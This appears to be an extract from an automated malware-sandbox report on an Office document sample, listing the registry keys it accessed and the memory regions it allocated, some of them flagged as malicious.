Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 355 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3499000
trusted library allocation
page read and write
malicious
3279000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
851000
heap
page read and write
malicious
3421000
trusted library allocation
page read and write
1F59000
heap
page read and write
250000
trusted library allocation
page execute and read and write
670000
heap
page read and write
3C6000
heap
page read and write
4160000
heap
page read and write
41B000
system
page execute and read and write
1F20000
heap
page read and write
3CBF000
stack
page read and write
26B0000
heap
page read and write
4516000
heap
page execute and read and write
2CC0000
heap
page read and write
23E0000
heap
page execute and read and write
241F000
stack
page read and write
3ACD000
stack
page read and write
850000
heap
page read and write
350000
heap
page read and write
2704000
trusted library allocation
page read and write
8A8000
heap
page read and write
2ADD000
stack
page read and write
2B30000
heap
page read and write
1D4000
trusted library allocation
page read and write
2D6B000
heap
page read and write
261D000
heap
page read and write
2702000
trusted library allocation
page read and write
4160000
trusted library allocation
page read and write
10000
heap
page read and write
4F0000
heap
page read and write
4EF2000
heap
page read and write
2E3F000
stack
page read and write
24FF000
stack
page read and write
2B20000
heap
page read and write
5DAE000
stack
page read and write
64A000
heap
page read and write
52E000
stack
page read and write
26A9000
heap
page read and write
490000
heap
page read and write
510E000
stack
page read and write
4CD0000
heap
page read and write
4510000
heap
page execute and read and write
1E0000
trusted library allocation
page read and write
1F66000
heap
page execute and read and write
26B4000
heap
page read and write
205000
trusted library allocation
page execute and read and write
2D0000
heap
page read and write
2C51000
heap
page read and write
B20000
heap
page read and write
9C0000
heap
page read and write
56F000
stack
page read and write
262D000
heap
page read and write
46E000
stack
page read and write | page guard
40F0000
trusted library allocation
page read and write
2AF4000
heap
page read and write
2CE7000
heap
page read and write
258B000
trusted library allocation
page read and write
10001000
direct allocation
page execute and read and write
635000
heap
page read and write
400000
system
page execute and read and write
1E0000
heap
page read and write
400000
system
page execute and read and write
66A000
heap
page read and write
2671000
heap
page read and write
A90000
heap
page read and write
2CE1000
heap
page read and write
284F000
stack
page read and write
3A7D000
stack
page read and write
1EFF000
heap
page read and write
64F000
heap
page read and write
52AE000
stack
page read and write
490000
trusted library allocation
page read and write
AC6000
heap
page read and write
88A000
heap
page read and write
6330000
trusted library section
page read and write
2667000
heap
page read and write
10000000
direct allocation
page read and write
4F3E000
stack
page read and write
450E000
stack
page read and write | page guard
89C000
heap
page read and write
4160000
trusted library allocation
page read and write
8C2000
heap
page read and write
2692000
heap
page read and write
2819000
trusted library allocation
page read and write
600000
heap
page read and write
255D000
trusted library allocation
page read and write
2020000
heap
page read and write
62F0000
heap
page read and write
85B000
heap
page read and write
24C2000
trusted library allocation
page read and write
1EA000
trusted library allocation
page read and write
2000000
heap
page read and write
779000
heap
page read and write
17E000
stack
page read and write
10000
heap
page read and write
1EB000
stack
page read and write
2160000
trusted library allocation
page read and write
4D3000
heap
page read and write
2360000
trusted library allocation
page execute and read and write
810000
heap
